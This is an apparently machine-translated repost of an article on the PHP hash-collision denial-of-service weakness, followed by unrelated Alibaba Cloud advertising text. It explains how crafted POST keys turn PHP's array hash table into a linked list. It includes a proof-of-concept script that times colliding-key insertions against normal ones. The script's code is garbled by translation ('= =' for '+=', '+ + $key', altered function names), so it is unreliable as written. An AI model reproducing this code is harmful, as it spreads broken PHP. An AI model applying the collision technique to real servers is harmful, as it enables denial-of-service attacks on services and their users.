Recently (looks like number 28th) from abroad (address: http://nikic.github.com/2011/12/28/Supercolliding-a-PHP-array.html) burst a new PHP conflict about array, You can use a conflict that invokes a hash table to make a denial-of-service attack on the server.
Rationale: At present many languages, using hash to store key–value data, including commonly used post data from users, can be constructed with a request header and accompanied by a large number of special "key" values (customized according to the hash algorithm for each language). The hash table that saves post data at the bottom of the language is degraded to a linked list because of "conflict" (collision).
In this way, if the amount of data is large enough, then the language can be computed, found, inserted, causing a large amount of CPU footprint, thereby implementing a denial-of-service attack.
<?php
$size = POW (2, 16);
$startTime = Microtime (true);
$array = Array ();
for ($key = 0, $maxKey = ($size-1) * $size; $key <= $maxKey; $key = = $size) {
$array [$key] = 0;
}
$endTime = Microtime (true);
echo ' Insert '. $size. ' A malicious element is needed '. $endTime-$startTime. ' seconds '. "\ n";
$startTime = Microtime (true);
$array = Array ();
for ($key = 0, $maxKey = $size-1; $key <= $maxKey; + + $key) {
$array [$key] = 0;
}
$endTime = Microtime (true);
echo ' Insert '. $size. ' A common element is needed '. $endTime-$startTime. ' seconds '. "\ n";
/**
* Results
*
* It takes 36.357950925827 seconds to insert 65,536 malicious elements
* 0.029613018035889 seconds to insert 65,536 normal elements
*/
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
